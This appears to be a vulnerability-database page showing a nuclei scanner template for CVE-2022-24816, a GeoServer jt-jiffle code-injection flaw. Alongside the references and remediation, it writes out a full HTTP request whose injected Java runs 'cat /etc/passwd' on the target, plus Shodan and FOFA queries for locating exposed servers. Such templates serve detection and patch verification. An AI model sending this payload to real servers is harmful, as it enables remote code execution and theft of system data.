Lucene search
K

GeoServer <1.2.2 - Remote Code Execution

🗓️ 01 Jul 2026 03:36:47Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 185 Views

GeoServer <1.2.2 - Remote Code Execution vulnerability in jt-jiffle script executio

Related
Refs
Code
id: CVE-2022-24816

info:
  name: GeoServer <1.2.2 - Remote Code Execution
  author: mukundbhuva
  severity: critical
  description: |
    Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.
  impact: |
    Successful exploitation of this vulnerability allows an attacker to execute arbitrary code on the target system.
  remediation: 1.2.22 contains a patch that disables the ability to inject malicious code into the resulting script. Users unable to upgrade may negate the ability to compile Jiffle scripts from the final application by removing janino-x.y.z.jar from the classpath.
  reference:
    - https://www.synacktiv.com/en/publications/exploiting-cve-2022-24816-a-code-injection-in-the-jt-jiffle-extension-of-geoserver.html
    - https://github.com/geosolutions-it/jai-ext/security/advisories/GHSA-v92f-jx6p-73rx
    - https://github.com/geosolutions-it/jai-ext/commit/cb1d6565d38954676b0a366da4f965fef38da1cb
    - https://nvd.nist.gov/vuln/detail/CVE-2022-24816
    - https://github.com/tanjiti/sec_profile
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2022-24816
    cwe-id: CWE-94
    epss-score: 0.98739
    epss-percentile: 0.99919
    cpe: cpe:2.3:a:geosolutionsgroup:jai-ext:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: geosolutionsgroup
    product: jai-ext
    shodan-query: /geoserver/
    fofa-query:
      - app="GeoServer"
      - app="geoserver"
  tags: cve,cve2022,geoserver,rce,geosolutionsgroup,kev,vkev,vuln

http:
  - raw:
      - |
        POST /geoserver/wms HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" encoding="UTF-8"?>
          <wps:Execute version="1.0.0" service="WPS" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://www.opengis.net/wps/1.0.0" xmlns:wfs="http://www.opengis.net/wfs" xmlns:wps="http://www.opengis.net/wps/1.0.0" xmlns:ows="http://www.opengis.net/ows/1.1" xmlns:gml="http://www.opengis.net/gml" xmlns:ogc="http://www.opengis.net/ogc" xmlns:wcs="http://www.opengis.net/wcs/1.1.1" xmlns:xlink="http://www.w3.org/1999/xlink" xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsAll.xsd">
            <ows:Identifier>ras:Jiffle</ows:Identifier>
            <wps:DataInputs>
              <wps:Input>
                <ows:Identifier>coverage</ows:Identifier>
                <wps:Data>
                  <wps:ComplexData mimeType="application/arcgrid"><![CDATA[ncols 720 nrows 360 xllcorner -180 yllcorner -90 cellsize 0.5 NODATA_value -9999  316]]></wps:ComplexData>
                </wps:Data>
              </wps:Input>
              <wps:Input>
                <ows:Identifier>script</ows:Identifier>
                <wps:Data>
                  <wps:LiteralData>dest = y() - (500); // */ public class Double {    public static double NaN = 0;  static { try {  java.io.BufferedReader reader = new java.io.BufferedReader(new java.io.InputStreamReader(java.lang.Runtime.getRuntime().exec("cat /etc/passwd").getInputStream())); String line = null; String allLines = " - "; while ((line = reader.readLine()) != null) { allLines += line; } throw new RuntimeException(allLines);} catch (java.io.IOException e) {} }} /**</wps:LiteralData>
                </wps:Data>
              </wps:Input>
              <wps:Input>
                <ows:Identifier>outputType</ows:Identifier>
                <wps:Data>
                  <wps:LiteralData>DOUBLE</wps:LiteralData>
                </wps:Data>
              </wps:Input>
            </wps:DataInputs>
            <wps:ResponseForm>
              <wps:RawDataOutput mimeType="image/tiff">
                <ows:Identifier>result</ows:Identifier>
              </wps:RawDataOutput>
            </wps:ResponseForm>
          </wps:Execute>

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
          - "ExceptionInInitializerError"
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100a8de6dd9fe72ef5972c3050bb8b3dfcfffdc125ca3656d7379442a33aeb99a1202200ee5b1a83d345ebb8f24e36a83dac9bdc9a8c99fdb7f44719a1c147f1bb99fd7:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.5High risk
Vulners AI Score7.5
CVSS 27.5
CVSS 3.110
EPSS0.98739
SSVC
185